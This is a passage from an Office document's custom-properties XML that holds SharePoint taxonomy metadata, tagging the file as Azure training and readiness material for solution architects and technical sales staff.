    <vt:lpwstr>35;#training materials|806588bc-f86d-4a67-aeb8-7206d3434c40;#212;#readiness|0bad9107-5243-4424-8599-de9537dda9af</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="Industries">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="Competitors">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="ExperienceContentType">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="22" name="SMSGDomain">
    <vt:lpwstr>21;#Cloud and Enterprise|adc2fe87-c79a-4ded-a449-3f86b954069d;#20;#Microsoft Azure Domain|d600a391-d529-4311-892b-2c05c1ab2538</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="23" name="BusinessArchitecture">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="24" name="Products">
    <vt:lpwstr>26;#Azure|669a3112-5edf-444b-a003-630063601f07</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="25" name="EnterpriseDomainTags">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="26" name="ActivitiesAndPrograms">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="27" name="Partners">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="28" name="Segments">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="29" name="Topics">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="30" name="Groups">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="31" name="Languages">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="32" name="TechnicalLevel">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="33" name="Audiences">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="34" name="Roles">
    <vt:lpwstr>1273;#Solution Architect|fb1f2d27-2db3-4a10-8f2f-7d4a4a158e5e;#361;#Technical Sales|831f7989-43a4-4e48-852a-a5355978f47f</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="35" name="_docset_NoMedatataSyncRequired">
    <vt:lpwstr>False</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="36" name="of67e5d4b76f4a9db8769983fda9cec0">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="37" name="NewsType">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="38" name="MSProducts">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="39" name="l6f004f21209409da86a713c0f24627d">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="40" name="la4444b61d19467597d63190b69ac227">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="41" name="MSProductsTaxHTField0">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="42" name="e8080b0481964c759b2c36ae49591b31">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="43" name="ldac8aee9d1f469e8cd8c3f8d6a615f2">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="44" name="EmployeeRole">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="45" name="NewsTopic">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="46" name="NewsSource">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="47" name="SMSGTags">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="48" name="MSPhysicalGeography">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="49" name="j3562c58ee414e028925bc902cfc01a1">
    <vt:lpwstr/>
  </property>
</Properties>
</file>